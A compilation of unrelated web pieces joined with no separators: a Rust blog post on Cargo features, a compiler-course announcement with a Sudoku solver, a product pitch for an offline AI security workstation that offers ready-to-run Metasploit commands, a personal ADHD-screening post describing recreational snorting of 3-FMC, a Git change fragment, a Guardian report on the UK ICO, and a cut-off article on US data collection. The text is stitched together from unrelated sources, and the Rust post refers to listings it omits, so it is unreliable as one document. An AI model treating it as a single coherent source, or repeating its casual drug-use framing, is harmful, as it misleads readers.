Two common criticisms of Rust development are the long compile times and the large number of dependencies that end up being used in projects. While people have drawn connections between these issues before, I've noticed that most discussions don't end up talking much about a specific tool that ostensibly should help mitigate this issue: Cargo features. For those not already familiar with Cargo features, I'd recommend the Rust book as an authoritative source of documentation for how they work; for those not interested in having to read something external to understand the rest of this post, here's a brief summary of how they work:
When creating a Rust package...
- you can define any number of "features"
- a feature can be tied to one or more "optional" dependencies, which will get included if the feature is enabled by downstream users and will not be included if disabled by downstream users
- a feature can depend on other features (either from within the same package or its dependencies), which will transitively include them whenever the feature that required them is enabled
- code inside the package can be conditionally included or excluded based on whether certain features are enabled or disabled
- the package defines which subset of the features are enabled by default

When depending on a Rust package that uses features...
- without specifying any additional details, the default set of features defined by the package will be used
- individual features can be enabled by manually listing them in the details of a dependency configuration
- default features can be disabled completely for a given dependency, meaning that only the individually listed features will be enabled
- a dependency that is specified more than once (either transitively by multiple direct dependencies or both directly and transitively) using versions that are considered compatible in terms of SemVer will be "unified", which means the union of the sets of specified features will be enabled

A small manifest sketching the package-author side of all this follows.
In case this is confusing, here's a concrete example: imagine a package called D has features called foo, bar, and baz. Package A depends directly on version 1.1.1 of D and specifies it uses the features foo and bar from it. A also depends directly on packages B and C. B depends directly on version 1.2.0 of D and uses the feature baz. Finally, C depends on version 1.5.0 of package D but doesn't specify any features. When compiling package A and its dependencies, package D will have features foo, bar, and baz enabled for all of A, B, and C.
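Concretely, the manifests for that example might look roughly like this (versions, paths, and the capitalized package names are schematic; crates.io would require lowercase names):

# D/Cargo.toml
[package]
name = "D"
version = "1.5.0"

[features]
foo = []
bar = []
baz = []

# A/Cargo.toml
[dependencies]
D = { version = "1.1.1", features = ["foo", "bar"] }
B = { path = "../B" }
C = { path = "../C" }

# B/Cargo.toml
[dependencies]
D = { version = "1.2.0", features = ["baz"] }

# C/Cargo.toml
[dependencies]
D = "1.5.0"

Because 1.1.1, 1.2.0, and 1.5.0 are SemVer-compatible, Cargo resolves them to a single copy of D and compiles it with the union {foo, bar, baz} of the requested features.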
At a high level, Cargo features give package authors a way to allow users to opt into or out of parts of their package, and in an ideal world, they would make it easy to avoid having to compile code from dependencies that you don't need. For those familiar with other languages that provide similar functionality, this might be recognizable as a form of conditional compilation. It's worth noting that one of the common uses of feature flags is giving users the ability to opt out of code that uses procedural macros, which often have an outsized impact on compile times. However, there are some quirks in the ways that features work that, at least to me, seem to get in the way of this happening in practice, and I've increasingly started to feel like they're a key piece of why the Rust ecosystem hasn't been able to improve the situation around compilation times and dependency bloat significantly.
Problems with "default-features"
In my opinion, the ergonomics around defining and using the default set of features get in the way of trying to reduce bloat and compile times. For example, by default, cargo doesn't show anything about what features are enabled in a dependency you've added. Here's an extremely contrived demonstration of how this might end up happening in a package I've defined locally:
# my-package/Cargo.toml
[package]
name = "my-package"
version = "0.1.0"
edition = "2021"
[dependencies]
my-dependency = { path = "../my-dependency" }
It imports another package that I've defined locally alongside it as a dependency. Currently, there's absolutely no code in this package other than the dependency:
# my-package/src/main.rs
fn main() {
}
Let's compile it!
$ time cargo build
Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 3.10s
real 0m3.155s
user 0m1.929s
sys 0m1.281s
Hmm, over three seconds to build a seemingly empty package in debug mode. Let's take a look at
my-dependency
to see what's going on.
# my-dependency/Cargo.toml
[package]
name = "my-dependency"
version = "0.1.0"
edition = "2021"
[features]
default = ["foo"]
foo = []
[dependencies]
my-dependency has a feature called "foo". We definitely didn't make any explicit choice to include it in my-package, and the cargo build output didn't mention it at all, but it's still going to be included by default because it's in the default feature list. What does the feature do though?
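The listing isn't reproduced here, but going by the next paragraph, my-dependency's source presumably contains something along these lines:

# my-dependency/src/lib.rs (reconstructed for illustration)
// A 400,000-byte static array of zeroes, only compiled when "foo" is enabled.
#[cfg(feature = "foo")]
pub static FOO: [u8; 400_000] = [0u8; 400_000];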
Whoops! Turns out someone defined a static array of 400,000 bytes of zeroes and exported it under the foo feature flag. What happens if we disable that feature in our original package?
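The exact manifest change isn't shown here, but opting out would look something like this in my-package:

# my-package/Cargo.toml
[dependencies]
my-dependency = { path = "../my-dependency", default-features = false }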
$ cargo clean && time cargo build
Removed 32 files, 1007.6MiB total
Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.20s
real 0m0.255s
user 0m0.152s
sys 0m0.107s
A fifth or a quarter of a second, depending on if you ask cargo or time. Either way, much better!
This example is obviously very silly, but at a high level, there's nothing stopping something similar from happening with real-world code because there's no obvious feedback given when using default features from dependencies.
The fact that default features can only be opted out of entirely, rather than disabled individually, can also be mildly annoying. If a package exposes 10 default features and you want to disable only one of them, the only way to do this currently is to disable all default features and then manually enable the nine that you don't want to disable. (As an aside, this also means that introducing new default features won't necessarily cause all packages that depend on it to get them by default; in the previous example, increasing the number of default features to 11 would cause the above strategy to disable both the feature it previously disabled and the newly added default feature. While this isn't necessarily a bad thing from the perspective of compile times, I'd still argue that this happening in a mostly hidden way to users who upgrade isn't ideal, and that this problem would be better avoided by having a more granular mechanism for disabling default features.)
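In manifest terms, with made-up feature names, that workaround ends up looking something like this:

# Hypothetical dependency with default features "a" through "j";
# to drop just "j", every other default feature has to be re-listed by hand.
[dependencies.some-dependency]
version = "1"
default-features = false
features = ["a", "b", "c", "d", "e", "f", "g", "h", "i"]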
Problems with transitive dependencies
It might sound like the issues with bloat from features would be mitigated by avoiding marking features as default, but there's an additional issue that would still prevent this from improving things very much. The only mechanism that currently exists for a library to expose the features of its dependencies transitively is to define its own features that each "map" to the features of its dependencies. Using the contrived example from above, my-package could define a feature that depends on the foo feature of my-dependency, and end-users of my-package could choose whether to include that feature or not. Without that, users of my-package will always end up with the exact set of features from my-dependency that my-package specifies; either all users of my-package get the foo feature from my-dependency or none of them do. In other words, Cargo doesn't provide any way to configure the set of features included from transitive dependencies.
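A minimal sketch of what that "mapping" approach looks like for the contrived example above (my own sketch, not a listing from earlier):

# my-package/Cargo.toml
[features]
# Re-export my-dependency's "foo" feature under a feature of our own,
# so end-users of my-package can opt in or out of it.
foo = ["my-dependency/foo"]

[dependencies]
my-dependency = { path = "../my-dependency", default-features = false }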
Imagine you've created a library that has five dependencies, and none of those have any dependencies of their own. Not too bad compared to a lot of Rust packages! In order to do their part to combat bloat and compile times, each of those libraries defines five optional features, with the idea that users of the package can avoid compiling the parts they don't need. If you don't necessarily need those features in your own library, but you happen to expose types from all five of those crates in your own API, you'd need to define twenty-five features in your own crate to give your users the option to avoid the bloat. The situation gets even worse when you consider transitive dependencies; if each of those five dependencies even had a single dependency of their own with two optional features, and they followed the same strategy of exposing these as well, you'd need to add another ten features to your package after the initial twenty-five, just to avoid forcing users of your own code to include code they don't need that you haven't written—on top of any features you define for users to avoid unnecessary bloat from your own code!
This is why I don't think that cleaning up the situation around how default features are specified would end up being sufficient to alleviate the current situation. Even if we had a magic wand that we could wave to "fix" every library in the ecosystem to define a bunch of features to disable arbitrary code (both from themselves and mapping to the features of their dependencies), the number of features that would need to be disabled transitively to actually eliminate all of the unnecessary code would be absolutely massive. To me, this is a fundamental flaw in what otherwise could be an effective way to reduce compile times in Rust without having to drastically change the way people use dependencies today.
What might help with these issues?
I think there are a number of possible changes that could be made that would mitigate or potentially even eliminate the issues I've described here. Some of the ideas I have would probably cause incompatibilities with the way things currently work, and while there are some existing strategies that might make them less disruptive (like tying them to a bump in the feature resolver version), I don't have enough expertise to know the exact details of how that would work. I'm also not entirely certain that the ideas I have would even be possible to implement, or that they would actually improve compile times and bloat rather than make them worse due to consequences that haven't occurred to me. Given all of that, I'd characterize the remainder of this post as brainstorming rather than recommendations or even realistic suggestions. If the issues I've outlined above resonate with others who read this post, hopefully smarter people than me with far more domain expertise will come up with an effective way to deal with them.
With that said, these are some of the potential mitigations for these issues I've come up with, along with my extremely unscientific attempt to quantify how much I'd expect them to improve the situation, the amount of effort to implement them, and my confidence that my assessment of their impact is correct:
Providing a mechanism to manually disable individual default features when specifying a dependency
- Low impact - This wouldn't drastically improve the status quo, but it would make trying to avoid bloat slightly easier in some situations
- Low effort - I'd expect this to be mostly straightforward to implement
- High confidence - The scope of this change is small enough that I don't think it's likely there are drastic unintended consequences that I haven't considered (although that doesn't necessarily mean that everyone would be happy with the consequences that are intended!)
A sketch of what this could look like in a manifest follows.
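To be clear, this is purely hypothetical syntax that Cargo does not support today; it's only meant to illustrate the idea:

# NOT real Cargo syntax: a hypothetical knob for dropping a single default
# feature without disabling the whole default set and re-listing the rest.
my-dependency = { version = "1", disable-features = ["foo"] }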
Providing a less verbose way for libraries to expose the features of their direct dependencies to other packages that depend on them directly
- Low impact - The direct impact of this change would essentially just be ergonomic, and it would only affect packages that reexport parts of their dependencies to their own users. If this included a way to disable transitive features that aren't needed, this could potentially make a large impact in the long run, but only if enough features ended up being exposed from libraries for people to disable enough code to make a difference
- Medium effort - At minimum, this would require augmenting the Cargo manifest format to define a way to configure this, and I don't have enough expertise in the way the feature resolver works to feel safe in assuming that this would be possible without changes there as well
- Medium confidence - I do think there's a small chance that this might not be feasible for some reason, but I also think there's a small chance that this change could have an outsized impact in alleviating the issues; eliminating the need to account for an exponential growth in feature count makes the "magic wand" to give us a world where all existing Rust APIs are sliced into bite-sized features much more enticing, so maybe we'll be lucky and giving the ecosystem enough incentive could cause people to start working towards making that hypothetical situation a reality
Providing a way to disable features from transitive dependencies
- Low impact - This is essentially the same as the previous idea, only configured from the package inheriting features transitively rather than the one exposing them
- Medium effort - I wouldn't be surprised if there was some additional work compared to the previous idea around handling conflicts when someone tries to disable a transitive feature that's required by the dependency they inherit it from, but this might not end up being hard to solve in practice
- Low confidence - Overall, I think this would end up being a messier way to achieve the same results as the previous idea. However, there's some value in allowing people to fix bloat in their own packages without requiring changes from every dependency along the transitive chain, and it's possible that I'm underestimating the magnitude of that additional value
"Zero-config" features that allow enabling/disabling code in a library without the author having to manually define it
High impact
- This would be the "magic wand" that I mentioned a few times above. The exact impact would depend on the granularity of the features it defines, but at the extreme end, automatically defining a separate feature for every individual item that gets exposed as part of a library's API could provide away to avoid including
any
code that isn't used, like a compile-time version of the
Unix
strip
utility
High effort
- The amount of work needed to implement this would be substantial at pretty much every step of the process: designing how it should work, implementing the design, testing that it works correctly, and benchmarking the results on real-world codebases to validate that it actually helps
Low confidence
: It's not clear to me whether this would be possible to do in a way that ended up being beneficial in practice.
Of the ideas listed here, this is definitely the most radical, so I wouldn't be surprised if some people react strongly to it. However, it's the idea that I think would have the most potential to improve things, so I think it deserves some additional elaboration on my part.
The first objection I'd expect to hear to this idea would be feasibility; it might not be obvious whether this can even be done in practice. I do think there are at least two potential ways that this would be at least possible to implement correctly: "one feature for every item in the crate" and "one feature for every module in the crate". At least from a computability perspective, it seems like it would be possible to enumerate each of these for a given library and define a corresponding feature, and then determine which (if any) of the others each of them depends on. Once that graph of feature dependencies is obtained, resolving the features that actually get used would presumably follow the same rules as resolving explicitly defined features.
The other objection I'd expect to hear is whether this would actually end up reducing compile times in practice. This concern is much harder for me to dismiss, and it's the reason I listed my confidence in the idea as "low". Any time saved by avoiding compilation of unused code would be offset by cost of having to determine how the features depend on each other, and there would be a tradeoff when deciding the amount of code in each of these features; having a larger number of "smaller" features would increase the amount of code that could be eliminated from compilation, but it would increase the amount of work needed to determine which of these features depend on each other. The amount of compilation that could be avoided could vary dramatically based on what parts of the library's API are being used, and the dependency graph of features might end up being so deep that the extra work to split into smaller features wouldn't end up eliminating more code than if a smaller set of "larger" features were picked instead.
Despite not being super confident that this would end up as a net improvement in compile times, this is still the idea I'm most interested in seeing discussed. Maybe someone will make a compelling enough argument against it that I'll change my mind, and most likely the idea won't end up going anywhere regardless of what my opinion is, but there's always a small chance that I was lucky enough to come up with a useful idea, and then we can all enjoy the benefits of having lower compile times finally.
Are you interested in building a compiler? Learning how functional languages are implemented? Gaining a bit of practical experience with x86-64 assembly language? If so, I invite you to try your hand at the projects in my class, CIS531. CIS531 is a masters-level class on compiler design which assumes that (a) you know how to program, (b) you've had some exposure to C (know about stack allocation, malloc, etc.), and (c) you have seen some assembly code. My class projects are in the Racket programming language, but if you don't know Racket, it is quite easy to learn: I have a set of YouTube video lectures that teach Racket quickly!
If you’ve never heard of Racket before, or you’re skeptical of
functional programming, indulge me for a bit: there’s no hardcore FP
theory or math in this course, and Racket is genuinely the best
language to use for this specific setup.
My class follows Prof. Jeremy Siek's excellent book, "Essentials of Compilation." While I highly recommend buying the book and supporting Prof. Siek, I will also note that there are free online preliminary editions floating around; in my class, I followed the free version and suggested that students buy the book if doing so fit their goals. However, along with the book, I also have a set of class slides along with sporadic course videos, both available on the class website.
This class builds up to a compiler with the following features:
- Variables and assignment via let
- Integer arithmetic via + and -
- Reading inputs / printing output
- Booleans, conjunctions/disjunctions (and/or)
- Branching via if, integer comparisons (<, etc.)
- Heap-allocated vectors
- Assignment / mutation (set!)
- While loops
- Fixed-arity functions and function application
- Lambdas (closures at runtime)
The unique combination of features lets us tour an interesting cross-section of programming languages, exploring both imperative programming with loops and mutation and functional programming with lists and recursion.
The Projects
To be specific, I challenge you to complete five projects, each including a comprehensive test suite that will seriously stress the correctness of your implementation. p1 is a warmup project (you should skip it if you already know Racket), but p2-p5 build a compiler for a set of increasingly-complex languages to x86-64. The languages nest inside of each other, with p2 giving us straight-line arithmetic, p3 giving us decision trees, p4 giving us loops and mutation, and p5 giving us functions, recursion, and lambdas.
p1 – Stack interpreter. This is a warmup project; if you know Racket and have some PL background, feel free to skip it.
The projects are designed with one key principle in mind: get us to the most expressive/fun language possible, as fast as possible. In doing this, we sacrifice a lot that might be typically covered:
- Our languages aren't type/memory safe; we assume the programmer is correct
- No register allocation (possible to add, not too hard)
- No garbage collection of any kind: we just use malloc. We could trivially support the Boehm GC (I have done that in the past), but it was another static library to link in and I really wanted to make this self-contained.
- We support a very limited set of builtins (but it is trivial to add more)
So even after project 5, getting to a "real" compiler would take a bit of effort. The most important additions (in my opinion) are (a) memory safety (the language needs to be safe, period) via dynamic type tagging, (b) slightly more builtins, and (c) register allocation. That would get us to a respectable compiler. After that, we could add more language features, or optimize the ones we have, e.g., by using abstract interpretation.
An Example Program
Our language will include functions, loops, branching, assignment, and even heap-allocated vectors. As an example of its power, here's a Sudoku solver written in the language:
(program
;; =========================
;; List primitives
;; Empty list is (void)
;; =========================
(define (is_nil x) (eq? x (void)))
;; cons cell as 2-element vector: [0] = head, [1] = tail
(define (cons h t)
(let ([c (make-vector 2)])
(let ([_ (vector-set! c 0 h)])
(let ([_ (vector-set! c 1 t)])
c))))
(define (head c) (vector-ref c 0))
(define (tail c) (vector-ref c 1))
;; =========================
;; Cell representation
;; cell = (row col val) as nested cons
;; =========================
(define (make_cell r c v)
(cons r (cons c (cons v (void)))))
(define (cell_row cell)
(head cell))
(define (cell_col cell)
(head (tail cell)))
(define (cell_val cell)
(head (tail (tail cell))))
;; =========================
;; Block indexing (0,1,2) for rows/cols
;; =========================
(define (block_index3 x)
(if (< x 3)
0
(if (< x 6)
1
2)))
(define (same_block? r1 c1 r2 c2)
(if (eq? (block_index3 r1) (block_index3 r2))
(eq? (block_index3 c1) (block_index3 c2))
#f))
;; =========================
;; Lookup current value at (row, col) in board
;; board is a list of cells
;; Return 0 if not assigned
;; =========================
(define (lookup board row col)
(if (is_nil board)
0
(let ([cell (head board)])
(let ([r (cell_row cell)])
(let ([c (cell_col cell)])
(if (and (eq? r row) (eq? c col))
(cell_val cell)
(lookup (tail board) row col)))))))
;; =========================
;; Conflict check:
;; #t if some cell in board has:
;; - same value, and
;; - same row OR same col OR same 3x3 block
;; =========================
(define (conflicts? board row col val)
(if (is_nil board)
#f
(let ([cell (head board)])
(let ([r (cell_row cell)])
(let ([c (cell_col cell)])
(let ([v (cell_val cell)])
(if (and (eq? v val)
(or (eq? r row)
(or (eq? c col)
(same_block? r c row col))))
#t
(conflicts? (tail board) row col val))))))))
;; =========================
;; Recursive backtracking solver over (row, col)
;; board: list of assignments
;; rows, cols = 0..8
;; =========================
(define (solve_cell row col board)
(if (eq? row 9)
;; All rows done: solved
board
(if (eq? col 9)
;; End of row: go to next row
(solve_cell (+ row 1) 0 board)
;; Otherwise, try this cell
(let ([existing (lookup board row col)])
(if (eq? existing 0)
;; Empty cell: try values 1..9
(let ([candidate 1])
(let ([solution (void)])
(begin
(while (and (< candidate 10)
(eq? solution (void)))
(begin
(if (conflicts? board row col candidate)
;; conflict, skip
(set! solution solution)
;; no conflict, extend board and recurse
(let ([s (solve_cell row
(+ col 1)
(cons (make_cell row col candidate)
board))])
(if (eq? s (void))
(set! solution solution)
(set! solution s))))
(set! candidate (+ candidate 1))))
solution)))
;; Pre-filled cell: just move on
(solve_cell row (+ col 1) board))))))
;; =========================
;; Read initial board from input:
;; 81 integers, row-major, 0 = empty, 1..9 = given
;; Returns list of cells
;; =========================
(define (read_board)
(let ([board (void)])
(let ([i 0])
(begin
(while (< i 9)
(begin
(let ([j 0])
(while (< j 9)
(begin
(let ([v (read)])
(if (eq? v 0)
(set! board board)
(set! board (cons (make_cell i j v) board))))
(set! j (+ j 1)))))
(set! i (+ i 1))))
board))))
;; =========================
;; Entry: read board, solve from (0,0), return solution
;; Solution is a list of (row col val) cells
;; =========================
(let* ([board (read_board)]
[solution (solve_cell 0 0 board)])
(lookup solution 8 8)))
The Full Language
The final language you’ll implement will be this one. In comments, I’ve also highlighted the sublanguages: for example, project 2 includes only numbers, input (read), binary plus, unary minus, variable references, and let binding. It grows to all of R5.
input-files/ – Input streams for programs (lines of integers).
goldens/ – Instructor goldens (IR snapshots, interpreter outputs, and stdout baselines).
You write your code in compile.rkt, which consists of a set of passes. Each pass transforms an input language into an output language, and these intermediate languages (IRs) are codified via predicates in irs.rkt. To define the meaning of each IR, we give an interpreter for each in interpreters.rkt. For the compiler to be correct, it needs to be the case that–for all input streams–the compiler produces the same output stream across all intermediate IRs. There is some system-specific stuff in system.rkt, which takes care of things like Linux vs. Mac ABI issues, specifying register names, etc. The main.rkt file acts as the main compiler entrypoint, and it carefully runs each pass of the compiler, checking predicates before/after each pass and interpreting each IR, checking to ensure consistency. This is a huge win for debugging, in my opinion: you always want to localize errors to the proximate pass which causes misinterpretation, and main.rkt seriously aids debugging in my experience. There is also more comprehensive test infrastructure in test.rkt; this test script is invoked by the Python-based test scripts in test/. These tests check the behavior of the compiler on the programs in the test-programs/ directory, using the files from input-files/ as inputs and comparing to the outputs in goldens/.
Why Is This Course Unique and Cool?
- You build a real compiler, all the way to actual x86-64 assembly.
- Each IR has a corresponding interpreter, which is easy to find/read and written in a familiar style, giving semantic clarity and testable correctness.
- The project is language scalable, meaning that you can use it as a base for building your own language. Of course, this is thanks to Dr. Siek's great "incremental" design.
- It is fully testable across multiple passes, which helps anticipate the thing we all fear most about writing a compiler: seeing a problem that is the ramification of far-away code from higher up in the compilation pipeline.
- It is written in a simple, pure recursive style. Just plain old pattern matching and recursion here, no need for any complex abstractions.
How Do I Get Started?
- Familiarize yourself with the course webpage: https://kmicinski.com/cis531-f25
- If you don't know Racket, start with project 1: https://kmicinski.com/cis531-f25/projects/1
- Otherwise, start with project 2: https://kmicinski.com/cis531-f25/projects/2
- When you finish each project, move on to the next!
- When you're done, start building your own language. Consider adding type checking/inference, classes, more builtins, pattern matching, continuations, exceptions, or algebraic effects. The options are myriad, but once you've finished projects 2-5, you've built a whole compiler for a surprisingly expressive language.
Thank you to the National Science Foundation and Others
If you like this work and live in the United States, please feel commensurately less bad about paying your taxes. I made the whole class free, or at least as free as I could given practical constraints. This class work on compilation is partially supported by our NSF PPoSS large grant, which has already produced many cool major results. In subsequent explorations, I am hoping that I can use this class compiler as a baseline for highly-scalable engines that reason about programs. Given its simple, self-contained nature–and the presence of per-pass interpreters and consistency testing–I see this as an awesome potential baseline for cool extensions.
My course is of course heavily inspired by Prof. Siek’s book and
course, along with inspiration from Thomas Gilray at Washington
State. Eight years ago, Tom and I took a spontaneous trip to see the
eclipse halfway across the country (skipping out on the ICSE ‘17
deadline basically); we discussed compiler design over a steamed
seafood buffet in Myrtle Beach after napping in a cheap motel, having
been awake for over 24 hours and feeling the eclipse had made it worth
it. We sketched out his whole compiler on that roadtrip, and ever
since that night eating steamed crabs, I wanted to build my own course
compiler. Now that I have, I am not sure it compares to waking up for
just four hours of twilight, only to consume copious amounts of butter
and shellfish as the brisk ocean air wisps over your face, the
closures and continuations softly washing rhythmically through the
conversation as you walk along the beach back to your $50 motel room.
In closing, thanks for checking this out; this compiler was a ton of fun to build. Even as someone who has some amount of expertise in compiler design, building it and getting it 100% right (I hope!) was such a rewarding experience. My sincere hope is that it offers students (and you!) a fun journey. If you end up doing anything with this, please get in touch: kkmicins@syr.edu. I'd love to see what you come up with. Best wishes,
Kristopher Micinski
– Syracuse, November, 2025
Show HN: Syd – An offline-first, AI-augmented workstation for blue teams
In a world of cloud-based AI, Syd stands apart. Delivered on a physical 1TB SSD and updated via encrypted USB, Syd is truly air-gapped. This means zero risk of your sensitive client data, vulnerabilities, or proprietary tools ever being exposed to a third-party service.
Powered by local Dolphin Llama 3 8B model – no internet connection required
Accelerated Workflow
Turn hours of manual analysis into seconds of AI-powered insight. Syd's RAG engine searches over 356,000 cybersecurity knowledge chunks and instantly transforms raw tool output into actionable intelligence.
Automatic detection of Nmap, Volatility, YARA, PCAP, and over 20 other tools
On-Demand Expertise
Syd combines a specialised LLM with over 356,000 chunks covering Metasploit exploits, Atomic Red Team techniques, forensics workflows, CVE databases, and threat intelligence, making expert-level knowledge accessible around the clock.
2GB+ knowledge base including exploits, forensics, and incident response workflows
For Red Teams
Syd empowers you with instant access to exploit intelligence. Paste Nmap results and get ready-to-run Metasploit commands and Exploit-DB links, turning vulnerability scans into actionable attack plans in seconds.
Syd provides context-aware remediation steps, malware-specific workflows from YARA outputs, and deep forensic insights from Volatility findings, helping you respond to threats faster and more effectively.
Syd knows the difference between offensive and defensive tools, providing exploit guidance for Nmap scans and remediation steps for YARA detections automatically.
There is a six-question test for ADHD that takes a minute to complete. If you score highly on it, you are likely to have ADHD and have a strong reason to talk to a psychiatrist about getting medication. It’s a low-effort way to surface a real problem for yourself — or help someone else surface it.
Here’s the story of how I found the test. If you just want the test, skip this section.
A few years ago, when I was moving from Moscow to London, I had small leftover amounts of the stimulants 3-FMC and MDPV from my student days. I'd use them for productivity during exam periods, but I never actually enjoyed them recreationally. Still, I was not going to carry sketchy chemicals across two borders, so I figured I'd experiment with recreational use.
I snorted a small line of 3-FMC and, instead of having fun, I finally felt clearheaded enough to stop procrastinating on writing a farewell post for my then-colleagues. I knew stimulants are a common treatment for ADHD, so a question popped into my head: do I have ADHD? Yes, stimulants help everyone focus, but the contrast was too striking to ignore.
I took a few online tests, and they did suggest ADHD. I then read more about ADHD online, and that also suggested I had it. I kept reading and reading, wanting full certainty.
An actual depiction of me trying to figure out ADHD
There was only one definitive way to find out: get a diagnosis from a psychiatrist.
I was leaving Russia in a few weeks, and Russia bans first-line ADHD medications like amphetamine and methylphenidate. So I decided to wait until I moved to London. Two months after arriving in London, I booked a private assessment with a psychiatrist. Shortly after, I had the 1.5-hour assessment and walked out with an ADHD diagnosis and a prescription for lisdexamfetamine, a prodrug of d-amphetamine.
One of the questionnaires they sent me before the appointment was very short. I later learned that this six-question screener is surprisingly effective.
In the test above, give yourself one point for each answer in the grey square. If you score 4 out of 6, you have a strong reason to suspect ADHD and get a proper assessment.
These six questions correctly identify about two thirds of adults with ADHD and miss the other third. They flag only about 0.5% of people without ADHD as possibly having ADHD.
If we assume 5% of people have ADHD (this source gives 4.4%, and this one gives 6%), then:
- The test would correctly pick up 3.5% of the population as having ADHD (0.69 × 5%).
- It would incorrectly flag about 0.5% (≈0.475%, rounding up) of the population who don't have ADHD.
So if you score 4 out of 6, the chance you actually have ADHD is:
3.5% / (3.5% + 0.5%) = 87.5%.
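If you prefer the arithmetic spelled out, here is the same calculation as a tiny program (unrounded, it comes out to roughly 87.9% rather than the rounded 87.5% above):

fn main() {
    let prevalence = 0.05;      // assumed ADHD base rate
    let sensitivity = 0.69;     // fraction of true cases the screener catches
    let false_positive = 0.005; // fraction of non-ADHD people it flags
    let true_pos = prevalence * sensitivity;              // ≈ 3.45% of everyone
    let false_pos = (1.0 - prevalence) * false_positive;  // ≈ 0.48% of everyone
    // Probability of actually having ADHD given a positive screen:
    println!("{:.1}%", 100.0 * true_pos / (true_pos + false_pos));
}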
ADHD is highly treatable with meds. First-line treatments for ADHD — stimulants like amphetamine and methylphenidate — work really well. To quote a podcast on psychiatry: “Stimulants are one of the most effective meds in psychiatry” (source), ”Not many treatments in psychiatry have a large effect size. There’s stimulants for ADHD, ketamine for depression” (source). 70-90% of people with ADHD find stimulants effective and experience noticeable quality of life improvements.
And if you don’t want to take stimulants or they don’t work for you, there are non-stimulant medications, such as atomoxetine or Intuniv.
This test is an imperfect screening tool that misses a third of all true ADHD cases and incorrectly flags a small percentage of non-ADHD people. But it has an incredible signal-to-effort ratio — it only takes a minute to take. If you score above its threshold, you have a strong reason to seek a full assessment.
Even if you are confident you don’t have ADHD, it’d only take you a minute to test your distractible friend. The right medication could be life-changing for them — it certainly was for me.
Changing the default hash function from SHA-1 to SHA-256, improving security.
Changing the default storage format to better support macOS and Windows, and to improve performance.
More formally integrating Rust into Git’s own build process
Civil liberties groups call for inquiry into UK data protection watchdog
Guardian
www.theguardian.com
2025-11-24 06:00:30
Dozens of civil liberties campaigners and legal professionals are calling for an inquiry into the UK’s data protection watchdog, after what they describe as “a collapse in enforcement activity” following the scandal of the Afghan data breach.
A total of 73 academics, senior lawyers, data protection experts and organisations including Statewatch and the Good Law Project, have written a letter to Chi Onwurah, the chair of the cross-party Commons science, innovation and technology committee, coordinated by Open Rights Group, calling for an inquiry to be held into the office of the information commissioner, John Edwards.
“We are concerned about the collapse in enforcement activity by the Information Commissioner’s Office, which culminated in the decision to not formally investigate the Ministry of Defence (MoD) following the Afghan data breach,” the signatories state. They warn of “deeper structural failures” beyond that data breach.
The Afghan data breach was a particularly serious leak of information relating to individual Afghans who worked with British forces before the Taliban seized control of the country in August 2021. Those who discovered their names had been disclosed say it has put their lives at risk.
“Data breaches expose individuals to serious danger and are liable of disrupting government and business continuity,” the letter states. “However, in a recent public hearing hosted by your committee, Commissioner John Edwards has shown unwillingness to reconsider his approach to data protection enforcement, even in face of the most serious data breach that has ever occurred in the UK.”
The signatories cite other serious data breaches including those affecting victims of the Windrush scandal.
But they say the ICO has applied its “public sector approach” in these cases and either issued reprimands – written notices that lack the force of law – or significantly lowered the monetary penalties it awarded.
“The ICO decision not to pursue any formal action against the MoD despite their repeated failures was extraordinary, as was its failure to record its decision making. The picture that emerges is one where the ICO public sector approach lacks deterrence, and fails to drive the adoption of good data management across government and public bodies.”
“The handling of the Afghan data breach is not an isolated case; many are being let down by the ICO and its numerous failures to use corrective powers.”
The letter warns that alongside the shift away from enforcement in the public sector, statistics contained in the latest ICO report show that private sector enforcement is also becoming rarer as organisations are diverting resources away from compliance and responsible data practices, knowing that the ICO is not going to pursue the matter.
“Parliament has given the ICO considerable powers not to politely hope for the best, but to enforce compliance with legally binding orders. As we heard from the public hearing you hosted, the ICO chose not to use these powers to address the Afghan data breach.
“Unfortunately, the Afghan data breach is not an isolated incident, but the symptom of deeper structural failures which are emerging in the way the ICO operates.”
The letter concludes: “Change appears to be unlikely unless the Science, Innovation and Technology Committee uses their oversight powers and steps in.”
A spokesperson for the ICO said: “We have a range of regulatory powers and tools to choose from when responding to systemic issues in a given sector or industry.
“We respect the important role civil society plays in scrutinising our choices and will value the opportunity to discuss our approach during our next regular engagement. We also welcome our opportunities to account for our work when speaking to and appearing before the DSIT select committee.”
Sunday Science: The Gravity Particle Should Exist. So Where Is It?
Portside
portside.org
2025-11-24 05:26:22
Matthew John O'Dowd is an Australian astrophysicist. He is an associate professor in the Physics and Astronomy Department at Lehman College of the City University of New York and the writer and host of PBS Space Time.
Space Time explores the outer reaches of space, the craziness of astrophysics, the possibilities of sci-fi, and anything else you can think of beyond Planet Earth with our astrophysicist host: Matthew O’Dowd.
Matt O'Dowd spends his time studying the universe, especially really far-away things like quasars, super-massive black holes, and evolving galaxies. He uses telescopes in space to do it. Matt completed his Ph.D. at NASA's Space Telescope Science Institute, followed by work at the University of Melbourne and Columbia University. He's now a professor at the City University of New York's Lehman College and an Associate at the American Museum of Natural History's Hayden Planetarium.
Previous host Gabe Perez-Giz is an astrophysicist who studies black hole physics. He received his Ph.D. from Columbia University and also hosted PBS Infinite Series.
It’s actually quite simple. You stop measuring them.
The government shutdown that just concluded left the country in something of a data blackout. Some major economic data releases have been delayed (like the September jobs report, which belatedly came out today), and others canceled altogether (the October jobs report, which will never be released). This has made it unusually difficult for U.S. businesses and the Federal Reserve to assess how well the economy is doing.
But if you assume the reopening of the government has put an end to these challenges, think again. The real threat to our understanding of the U.S. economy, and the country’s health writ large, is not that measly, six-week shutdown fight. It’s the fact that the Trump administration has been quietly snuffing out thousands of other data series, particularly those that might produce politically inconvenient results.
Take for example President Donald Trump’s boasts about bringing more international investment into the United States.¹ He extracted pledges from Switzerland and South Korea. Just this week, he boasted of a whopping $1 trillion in blood money from Saudi Arabian Crown Prince Mohammed bin Salman (as my colleague Andrew Egger notes, the Saudi investment jumped from $600 billion to $1 trillion in the course of a few minutes and would, if real, amount to an absurd chunk of the country’s GDP).
But fulfillment of such pledges is notoriously fickle; in the past, plenty of foreign companies and governments have promised big investments in U.S. factories and jobs that never materialized, generating bad headlines for the politicians who wrangled them. Fortunately for Trump, these pledges will become increasingly un-fact-checkable.
